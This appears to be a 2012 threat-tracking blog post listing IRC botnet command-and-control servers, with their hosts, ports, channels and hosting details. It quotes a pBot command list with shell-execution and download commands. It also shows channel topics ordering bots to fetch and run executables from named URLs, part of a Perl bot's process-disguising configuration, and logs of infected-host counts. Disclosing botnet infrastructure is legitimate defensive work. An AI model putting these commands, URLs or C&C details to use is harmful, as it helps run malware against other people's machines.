Month: April 2012

69.66.87.90(pBot hosted in United States Des Moines Des Moines Public Schools)

    = COMMANDS ============================================================================
    .user <password> //login to the bot
    .logout //logout of the bot
    .die //kill the bot
    .restart //restart the bot
    .mail <to> <from> <subject> <msg> //send an email
    .dns <IP|HOST> //dns lookup
    .download <URL> <filename> //download a file
    .exec <cmd> // uses shell_exec() //execute a command
    .cmd <cmd> // uses popen() //execute a

yaboyyoshi.info(ngrBot hosted in United Kingdom Redstation Limited)

    Resolved : [yaboyyoshi.info] To [149.3.139.227]
    Remote Host Port Number
    yaboyyoshi.info 6969 PASS none

Update from our anonymous friend: yaboyyoshi.info:5500 or 6969 pass: none channel #aryan#

    Now talking in #aryan#
    Topic On: [ #aryan# ] [ @dload http://jessieandthetoyboys.com.br/cc_sminer_4-29.exe 1 ]
    Topic By: [ Yoshi ]

hosting infos: http://whois.domaintools.com/149.3.139.227

irc.s4l1ty.info(Linux bots hosted in Indonesia Jakarta Primanet)

“Private Bot” lol

    #!/usr/bin/perl
    #
    # Thanks To: irc.RoIrc.in
    ########## Configuration ############
    my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
    my $processo = $ps[rand scalar @ps];
    $servidor='irc.s4l1ty.info' unless $servidor;
    my $porta='6667';
    my @canais=("#X");
    my @adms=("s4l1ty");
    # Anti Flood ( 6/3 Recomendado )
    my $linas_max=10;
    my $sleep=5;
    my $nick = getnick();
    my $ircname = getident2();

188.165.202.199(500 ngrBots hosted in France Paris Ovh Systems)

    Server:188.165.202.199:7000
    JOIN #team hell
    Local users: Current Local Users: 479 Max: 573
    Global users: Current Global Users: 479 Max: 573
    #team {DE|W7-64a}mkliatk!x@EFF4177A.A0F8E1F4.CC6C8B5.IP ~ZRt!Expl3it@IDFADM @Rejuven!Shlomi@IDFADM ~DAKiNE!Anonymous@IDFADM ~wGi!Nikka@IDFADM
    End of /NAMES list.
    :wGi!Nikka@IDFADM PRIVMSG #team :.usb on

is funny how irc bots can steal passwd from chrome

    Session Start: Mon Apr 02 21:13:59 2012
    Session Ident: #team

retk01.com(ngrBot hosted in razorservers.com)

    Resolved : [retk01.com] To [208.83.233.194]
    Resolved : [retk01.com] To [208.83.234.66]
    Resolved : [retk01.com] To [208.83.232.90]
    Now talking in #asdf
    Topic On: [ #asdf ] [ ~pu http://hotfile.com/dl/151810986/ee21746/2abril.exe de5da5df4246178095743f3a7827f150 ~s -o ~s ]
    Topic By: [ google ]
    Modes On: [ #asdf ] [ +smntMu ]
    Now talking in #xp
    Topic On: [ #xp ] [

m49.no-ip.biz(irc botnet hosted in United Kingdom Burstnet Limited)

    Remote Host Port Number
    m49.no-ip.biz 9876 PASS none
    Now talking in #AryaN
    Modes On: [AryaN ] [ +]
    Local users: Current Local Users: 311 Max: 317
    Global users: Current Global Users: 311 Max: 317
    Quits: Replace [nnscript@uNkn0wn.eu] (Client hat die Verbindung getrennt 14)
    Joins: New{IS-WN7-x64}2432505 [2432505@0wn3d-C0A9361D.du.xdsl.is]

hosting infos: http://whois.domaintools.com/178.238.136.38